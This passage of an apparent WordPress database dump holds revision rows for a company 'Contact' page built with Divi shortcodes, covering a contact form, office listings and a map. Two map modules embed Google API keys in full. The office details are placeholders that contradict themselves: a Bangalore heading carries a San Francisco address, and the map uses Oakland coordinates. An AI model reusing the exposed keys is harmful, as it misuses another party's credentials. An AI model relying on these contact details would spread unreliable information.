animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 18:59:35','2020-08-08 18:59:35','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(677,1,'2020-08-08 19:02:53','2020-08-08 19:02:53','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\" hover_enabled=\"0\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi - 110028, India\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"4.5.2\" child_filter_saturate=\"30%\" hover_enabled=\"0\" google_api_key=\"AIzaSyDibxLxREj180sPObuXHeb26-1F7qVhLEI\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 19:02:53','2020-08-08 19:02:53','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(679,1,'2020-08-08 19:10:47','2020-08-08 19:10:47','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map google_api_key=\"AIzaSyAdnWMyhH9MNLMG_ej6wNpMPsbnpXzDomw\" address=\"B-53/2, Naraina Vihar, New Delhi - 110028, India\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"4.5.2\" child_filter_saturate=\"30%\" hover_enabled=\"0\"][et_pb_map_pin pin_address=\"B-53/3, Naraina Vihar, New Delhi - 110028, India\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"4.5.2\" hover_enabled=\"0\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 19:10:47','2020-08-08 19:10:47','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(683,1,'2020-08-08 19:17:34','2020-08-08 19:17:34','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 